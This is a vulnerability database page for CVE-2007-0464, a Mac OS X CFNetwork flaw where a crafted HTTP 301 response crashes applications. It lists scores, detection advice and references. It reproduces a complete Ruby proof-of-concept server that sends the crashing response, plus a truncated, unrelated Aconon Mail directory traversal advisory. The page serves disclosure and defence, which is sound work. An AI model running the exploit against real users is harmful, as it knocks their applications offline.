CVE-2007-0464
published 2007-01-30CVE-2007-0464: The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of…
PriorityP424medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
14.38%
96.2th percentile
The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application crash) via a crafted HTTP 301 response, which results in a NULL pointer dereference.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cfnetwork | cfnetwork | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for application crashes (NULL pointer dereference) in processes using CFNetwork 129.19 on Mac OS X 10.4–10.4.10 following receipt of an HTTP 301 redirect response. ↗
- ·The vulnerability is specific to CFNetwork version 129.19 on Apple Mac OS X 10.4 through 10.4.10; detection rules targeting this CVE should be scoped to that platform and library version to avoid false positives on patched or unaffected systems. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aconon Mail 2004 - Directory Traversal
exploitdb·2008-01-23
CVE-2008-0464 Aconon Mail 2004 - Directory Traversal
Aconon Mail 2004 - Directory Traversal
---
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature rich web interface for both, users and administrators. This
includes a public available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The used template may be overwritten by any user, modifying the
HTTP-GET "template" form parameter. This parameter is checked against
code injection, not against directory traversal though.
Proof of Concept:
http://www.aco
Exploit-DB
Apple CFNetwork - HTTP Response Denial of Service
exploitdb·2007-01-25
CVE-2007-0464 Apple CFNetwork - HTTP Response Denial of Service
Apple CFNetwork - HTTP Response Denial of Service
---
#!/usr/bin/ruby
# (c) Copyright 2007 Lance M. Havok
# Proof of concept for MOAB-25-01-2007.
#
require 'socket'
web_port = (ARGV[0] || 80).to_i
puts "++ Starting HTTP server at port #{web_port}."
web_server = TCPServer.new(nil, web_port)
while (session = web_server.accept)
rand_clen = rand(80)
useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp!
puts "++ Connected: #{useragent}"
session.print "HTTP/1.1 301 OK\r\n"
session.print "Content-Type: text/html\r\n"
session.print "Content-Length: #{rand_clen}\r\n"
session.print "Location: http://nonexistent123\r\n\r\n"
session.print "X" * rand_clen
session.close
end
# milw0rm.com [2007-01-25]
No writeups or analysis indexed.
http://docs.info.apple.com/article.html?artnum=307041http://lists.apple.com/archives/security-announce/2007/Nov/msg00002.htmlhttp://projects.info-pull.com/moab/MOAB-25-01-2007.htmlhttp://secunia.com/advisories/27643http://www.osvdb.org/32704http://www.securityfocus.com/bid/22249http://www.securityfocus.com/bid/26444http://www.us-cert.gov/cas/techalerts/TA07-319A.htmlhttp://www.vupen.com/english/advisories/2007/3868https://exchange.xforce.ibmcloud.com/vulnerabilities/31837https://www.exploit-db.com/exploits/3200http://docs.info.apple.com/article.html?artnum=307041http://lists.apple.com/archives/security-announce/2007/Nov/msg00002.htmlhttp://projects.info-pull.com/moab/MOAB-25-01-2007.htmlhttp://secunia.com/advisories/27643http://www.osvdb.org/32704http://www.securityfocus.com/bid/22249http://www.securityfocus.com/bid/26444http://www.us-cert.gov/cas/techalerts/TA07-319A.htmlhttp://www.vupen.com/english/advisories/2007/3868https://exchange.xforce.ibmcloud.com/vulnerabilities/31837https://www.exploit-db.com/exploits/3200
2007-01-30
Published